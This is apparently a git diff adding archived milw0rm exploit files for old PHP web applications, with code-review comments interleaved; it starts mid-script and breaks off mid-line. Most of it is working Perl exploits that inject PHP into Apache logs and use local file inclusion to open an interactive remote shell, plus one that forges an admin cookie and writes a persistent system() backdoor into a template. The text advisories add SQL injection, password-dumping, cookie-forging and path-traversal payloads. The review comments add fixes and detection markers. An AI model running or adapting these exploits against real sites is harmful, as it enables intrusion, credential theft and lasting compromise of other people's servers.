HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " My Simple Forum RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". 
+ " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt b/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt new file mode 100644 index 0000000..4d541c2 --- /dev/null +++ b/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt 
@@ -0,0 +1,57 @@ +Name: Nitrotech 0.0.3a Multiple Remote Vulnerabilities +Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr +Author: Osirys, thanks to x0r +Contact: osirys@live.it + +Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection. + +#### Remote File Inclusion Vulnerability + +The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable. +Let's see the code. + +File: /[path]/includes/common.php + +[code] + $root. +To fix this bug, we could just define this variable. + +#### Sql Injection Vulnerability + +Note: In the source there could be other sql injection, just found them by yourself if you are intersted ! + +This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability +we could filtered the variable, for example with an int(). + +File: /[path]/members.php + +[code] + if($page_mode == 'view_user') + { + $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'"; + $result1 = mysql_query($query1); +# OTHER CODE +[/code] + +## EXPLOIT: + http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user& +## + +As we can see, The 'id' variable comes directly from get. So we can inject our hell code. + +#### + +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/OwenPoll 1.0 - Insecure Cookie Handling.txt b/OwenPoll 1.0 - Insecure Cookie Handling.txt new file mode 100644 index 0000000..90d0c23 --- /dev/null +++ b/OwenPoll 1.0 - Insecure Cookie Handling.txt 
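Review bot: The suggested mitigation "filtered the variable, for example with an int()" is not valid PHP; the concrete change is `$id = (int) $_GET['id'];` (or `intval()`) before the query and `"... WHERE id = " . $id`, and since the note itself admits other queries in the application may be built the same way, a parameterised query is the fix that generalises. The RFI section's `[code]` block is cut off — only `$root.` survives, with neither the `include` statement nor a closing `[/code]` — so a reader cannot see which include is affected; the original line should be restored. Two caveats a reader will want: the RFI presupposes `register_globals=On` (that is what makes an undeclared `$root` attacker-controlled) together with `allow_url_include`/`allow_url_fopen` enabled on the target, and defining `$root` before the include closes this instance only, leaving every other undeclared variable exposed while `register_globals` stays on.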
@@ -0,0 +1,48 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : OwenPoll 1.0 +Download : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/checkloginmini.php + +[CODE] + + if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){ + // authentication was successful + // create session and set cookie with username + session_start(); + $_SESSION['auth'] = 1; + + setcookie("username", $_POST['txtusername'], time()+(86400*30)); + +[/CODE] + +If we log in correctly, a cookie is set with name "username" and as content the username name. + +[!] FIX: Set as content username's password. + +[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "username=admin_username; path=/"; + *admin_username is the nick of the administrator + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/PHP Photo Album 0.8b - Local File Inclusion.txt b/PHP Photo Album 0.8b - Local File Inclusion.txt new file mode 100644 index 0000000..add182b --- /dev/null +++ b/PHP Photo Album 0.8b - Local File Inclusion.txt 
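Review bot: The proposed fix, `setcookie("username", $_POST['txtpassword'], time()+(86400*30));`, makes the application worse rather than better: it stores the administrator's plaintext password in a client-side cookie for 30 days (without `HttpOnly` or `Secure`), exposing it to XSS, shared browsers and the network, and any page that trusts the cookie remains forgeable by anyone who knows the password. The correct fix is to stop using the `username` cookie for authorization altogether and check the session that `checkloginmini.php` already establishes, e.g. `session_start(); if (empty($_SESSION['auth'])) { /* redirect to the login page */ exit; }` at the top of each protected page. The quoted code shows only where the cookie is set; the advisory should name the page that reads `$_COOKIE['username']` to grant access, since that is where the vulnerability actually lives and what the `document.cookie` exploit line depends on.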
@@ -0,0 +1,52 @@ +[START] + +################################################################################################################################### +[0x01] Informations: + +Script : Php Photo Album 0.8 BETA +Download : http://sourceforge.net/project/downloading.php?group_id=151573&use_mirror=kent&filename=PHPPA_.9_BETA.zip&37834145 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian + + +################################################################################################################################### +[0x02] Bug: [Local File Inclusion] +###### + +Bugged file is: /[path]/index.php + +[CODE] + +$skin_temp = $_GET['preview']; +if(isset($_GET['preview']) && file_exists("./skin/$skin_temp/config.php")){ + $skin = $_GET['preview']; + } +else{ + $skin = vari("skin"); + } +require("./skin/$skin/config.php"); + +[/CODE] + +If 'preview' from GET is provided, we can include it just bypassing a stupid cheek. +file_exists("./skin/$skin_temp/config.php) <-- this cheek is stupid, becouse when +we set a value to $skin_temp , if we set a local file with a directory trasversal +it's obvious that the file exists, so it will be included. + +[!] FIX: Use another filter instead of file_exists("./skin/$skin_temp/config.php) + Just filter $skin_temp before include it. A fix could be to declare $skin + with a standard or local value, or just put the allowed values in an array, + and cheek then if the skin provided is allowed. See is_in_array() function + + +[!] EXPLOIT: /[path]/index.php?preview=[local_file]%00 + ../../../../../../../../../../../../etc/passwd%00 + +################################################################################################################################### + +[/END] + +# milw0rm.com [2009-01-14] \ No newline at end of file 
diff --git a/PHPbbBook 1.3 - Local File Inclusion.pl b/PHPbbBook 1.3 - Local File Inclusion.pl new file mode 100644 index 0000000..d7fc443 --- /dev/null +++ b/PHPbbBook 1.3 - Local File Inclusion.pl 
@@ -0,0 +1,206 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# App => PHPbbBook 1.3 +# Downl => http://phpbbbook.syssap.nl/downloads/PHPbbBook-1.3h.zip + +# Remote Command Execution Exploit (Log Inj) +# Bug: Local File Inclusion /-> /[path]/bbcode.php?l=[lf]%00 +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org + + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi_rce.txt http://localhost/PHPbbBook/ bbcode.php?l= + +# --------------------------------- +# PHPbbBook RCE Exploit +# via Log Inj +# by Osirys +# --------------------------------- + +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/PHPbbBook +# shell[localhost]$> exit +# [-] Quitting .. 
+# osirys[~]> +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = $ARGV[1]; +my $null_byte = "%00"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host,$lfi_path) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$php_code."0end HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] 
Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $log_path."&cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /start0(.+?)0end/sg) { + if ($1 =~ /0end/) { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + else { + push(@outs,$1); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------------- \n". + " PHPbbBook RCE Exploit \n". + " via Log Inj \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path lfi_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/PhotoStand 1.2.0 - Remote Command Execution.pl b/PhotoStand 1.2.0 - Remote Command Execution.pl new file mode 100644 index 0000000..193bc06 --- /dev/null +++ b/PhotoStand 1.2.0 - Remote Command Execution.pl 
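Review bot: None of the Perl scripts in this commit enable `use strict;` or `use warnings;`, so the package globals this one leans on (`$h0st`, `$path`, `$log_path`, `$re`, `$c`) are never declared and a typo silently creates a fresh variable; the same applies to the PhotoStand, Pyrophobia, Simple PHP News and Syzygy scripts. The subs are also declared with empty prototypes (`sub get_req()`, `sub cheek()`, `sub help()`) and called with `&banner;`, which bypasses prototype checking and passes the caller's `@_` — drop the `()` from the declarations and call `banner();`. From a defender's view the header should name what the technique leaves behind: the injected request line is written verbatim into the web server's access log, so the literal markers `Osirys_log_inj` and `start0`…`0end` in an access log are a direct indicator of this activity, e.g. `# Detection: the request path "Osirys_log_inj" is logged verbatim by the target web server`. The underlying issue the header documents (`bbcode.php?l=` reaching an include) is fixed on the application side by mapping `l` onto an allowlist of language files rather than by filtering the string.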
@@ -0,0 +1,257 @@ +#!/usr/bin/perl + +# App : PhotoStand 1.2.0 +# Site : http://www.photostand.org +# Remote Command Execution Exploit +# Credits to : Giovanni Buzzin, "Osirys" +# osirys[at]autistici[dot]org +# Greets: drosophila, emgent, Fireshot + +# PhotoStand is a used Image Gallery CMS. +# PhotoStand is vulnerable to SQL Injection, (AUTH BYPASS), creating a cookie with the nick of the admin encoded in BASE64, +# a remote user is able to become Admin. The exploit just bypass the login, and edits the template putting in it code prone +# to RCE. It doesn't change anything, in fact it gets the previous template, and just adds the hell code. +# ENJOY + +# Google Dork: powered by PhotoStand Design by Vlad + +# ------------------------------------------------------------------------------------- +# Exploit tested in Local : +# ------------------------------------------------------------------------------------- +# osirys[~]>$ perl r0x.txt http://localhost/photostand_1.2.0/photostand_1.2.0/ admin +# +# ---------------------------- +# Photobase RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [*] Bypassing Admin Login with a evil cookie ! +# [+] SESSION ID grabbed: sbt9f85ps9n29an2d31911n806 +# [*] Admin Login Bypassed ! +# [*] Template source Found, editing it .. +# [*] Template edited, backdoored !! +# [*] Shell succesfully spawned !! +# [:D Hi myLord, execute your commands !! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/photostand_1.2.0/photostand_1.2.0/templates/Simplified +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; +use URI::Escape; +use MIME::Base64; + +my $host = $ARGV[0]; +my $user = $ARGV[1]; +my $rand = int(rand 150); +my $rand1 = "1337".$rand; +my $rce = "$rand1
\";system(§§§_GET[cmd]);echo \"$rand1
\";}?>"; +my $rce_p = "/templates/Simplified/index.php?cmd="; + +chomp($user); +$cookie = encode_base64($user); +$cookie =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; +$cookie =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; + +help("-1") unless (($host)&&($user)); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Bypassing Admin Login with a evil cookie !\n"; +socket_req("GET",$path."/admin/index.php",$cookie,"",1); +$phpsessid || die "\n[-] Can't login with evil Cookie !\n\n"; +$cookie .= "; PHPSESSID=".$phpsessid; +socket_req("GET",$path."/admin/newart.php",$cookie,"",2,"New article<\/title>"); +$gotcha == 1 || die "\n[-] Can't login with evil Cookie !\n\n"; +print "[*] Admin Login Bypassed !\n"; +socket_req("GET",$path."/admin/options.php?page=editor&edit=Simplified",$cookie,"",3); + +my $re = join '', @tmp_out; +my $content = tag($re); +if ($content =~ /class="textbox">(.+)<\/textarea>/) { + $template = $1; + print "[*] Template source Found, editing it ..\n"; +} +else { + print "[-] Template source not Found, exiting ..\n"; + exit(0); +} + +$template =~ s/(.+)/$rce$1/; +$template =~ s/\*/\n/g; +$template =~ s/\$/ /g; +$template =~ s/§§§/\$/g; +$template =~ s/\( _GET/(\$_GET/g; +my $code = uri_escape($template); +$code =~ s/\(/%28/g; +$code =~ s/\)/%29/g; +$code =~ s/%20/+/g; +$code =~ s/'/%27/g; +$code =~ s/!/%21/g; + +my $post = "action=save&tpid=4&tp=index.php&template=Simplified&type=1&page=editor&editpage=".$code; +socket_req("POST",$path."/admin/options.php",$cookie,$post,0,"",1); + +my $exec_url = ($host.$rce_p."id"); +my $re = get_req($exec_url); +if ($re =~ /uid=/) { + print "[*] Template edited, backdoored !!\n[*] Shell succesfully spawned !!\n[:D Hi myLord, execute your commands !!\n\n"; + &exec_cmd; +} +else { + print "[-] Something wrong, sploit failed !\n\n"; + exit(0); +} + +sub socket_req() { + my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = 
@_; + my $stop; + my $length = length($content); + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + if ($sock_opt == 1) { + $opt_1 = "Referer: ".$host."/admin/options.php?page=editor&edit=Simplified\r\n"; + $opt_2 = "Content-Type: application/x-www-form-urlencoded\r\n"; + } + else { + $opt_1 = ""; + $opt_2 = ""; + } + my $data = $request." ".$path." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + $opt_1. + "Cookie: PS-SAVE=".$cookie."\r\n". + $opt_2. + "Content-Length: ".$length."\r\n\r\n". + $content."\r\n"; + + $socket->send($data); + while ((my $e = <$socket>)&&($stop != 1)) { + if ($opt == 0) { + $stop = 1; + } + elsif ($opt == 1) { + if ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { + $phpsessid = $1; + print "[+] SESSION ID grabbed: $phpsessid\n"; + $stop = 1; + } + } + elsif ($opt == 2) { + if ($e =~ /$regexp/) { + ($stop,$gotcha) = (1,1); + } + } + elsif ($opt == 3) { + push(@tmp_out,$e); + } + + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $host.$rce_p.$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/
$rand1
(.+)$rand1
/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------- \n". + " PhotoStand RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad Input!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_username\n"; + print " admin_username is the nick of the admin.\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-26] \ No newline at end of file diff --git a/Photobase 1.2 - Local File Inclusion.txt b/Photobase 1.2 - Local File Inclusion.txt new file mode 100644 index 0000000..6d3c416 --- /dev/null +++ b/Photobase 1.2 - Local File Inclusion.txt 
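Review bot: The header comment `It doesn't change anything, in fact it gets the previous template, and just adds the hell code` is misleading: the `action=save&tpid=4&...&editpage=` POST in the main flow rewrites `templates/Simplified/index.php` on the target with `$rce` (a `system($_GET[cmd])` call once the `§§§` placeholder is substituted) inserted at the start, and nothing in the script restores the original, so a run leaves a persistent web shell that an administrator must find and remove by hand. The comment should say so plainly, e.g. `# NOTE: this PERMANENTLY modifies templates/Simplified/index.php on the target; keep a copy of the original template for restoration`. For detection, the inserted code is bracketed by the `1337<n>` marker held in `$rand1`, so file-integrity monitoring of the templates directory, or a search of template files for `system($_GET`, catches the change. The root cause the header describes (the `PS-SAVE` cookie carrying only the base64 admin nick as proof of login) is fixed by tying admin authorization to the server-side PHP session rather than to a client-supplied value.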
@@ -0,0 +1,45 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : Photobase 1.2 +Download : http://www.monstar.nl/php-bin/count.php3?what=photobase.zip&id=0 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org + + +#################################################################################################################### +[0x02] Bug: [Local File Inclusion] +###### + +Bugged file is: /[path]/include/header.php + +[CODE] + + $language + +[!FIX] Filter $language before the include or just set its value with a local file. + + +[!] EXPLOIT: /[path]/include/header.php?language=[local_file] + ../../../../../../../../../../etc/passwd%00 + +#################################################################################################################### + +[/END] + +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/ProQuiz 1.0 - Authentication Bypass.txt b/ProQuiz 1.0 - Authentication Bypass.txt new file mode 100644 index 0000000..85d9146 --- /dev/null +++ b/ProQuiz 1.0 - Authentication Bypass.txt 
@@ -0,0 +1,32 @@ +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [0] GENERAL DETAILS: + +Name : ProQuiz 1.0 Sql Injection (Auth bypass) +Download : http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754 +Vulnerability : Sql Injection (Admin Login Bypass) +Author : Osirys +Contact : osirys[at]live[dot]it + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [1] BUG EXPLANATION: + +The affected file is /admin/index.php. Let's see the code. + +[CODE] +if($_GET['menu'] != 'madmin') + { + if(isset($_POST['username']) && isset($_POST['password'])) + { + $query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' "; +[/CODE] + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [2] EXPLOITATION: + +Just go in /[path]/admin/index.php. Login with the following details: +Username : ' or 1=1# +Password : anything + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl b/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl new file mode 100644 index 0000000..4cfd44e --- /dev/null +++ b/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl 
@@ -0,0 +1,237 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Pyrophobia 2.1.3.1 | +# |Download : http://surfnet.dl.sourceforge.net/sourceforge/pyrophobia/pyro2_1_3_1.tar.gz | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit via Apache Log Injection | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |/[path]/index.php is affected to Local File Inclusion vulnerability: +# |[code] +# | +# | if($_GET['pid']){ //if page id is set do custom content functions +# | $pid=stripslashes($_GET['pid']); +# | $pid=htmlspecialchars($pid); +# | if ($pid=='') { +# | include('modules/index.php'); +# | } elseif (!file_exists('content/'.$pid.'.php')) { +# | include('modules/index.php'); +# | } else { +# | include('content/'.$pid.'.php'); +# | } +# | } +# |<.... code ....> +# |[/code] +# |$pid comes from GET directly. +# |Works regardless of php.ini settings ! +# |p0c : /[path]/index.php?pid=[lfi]%00 + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi.txt http://localhost/pyro2_1_3_1/ +# +# --------------------------------- +# Pyrophobia Forum RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. 
+# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/pyro2_1_3_1 +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/index.php?pid="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." 
HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ 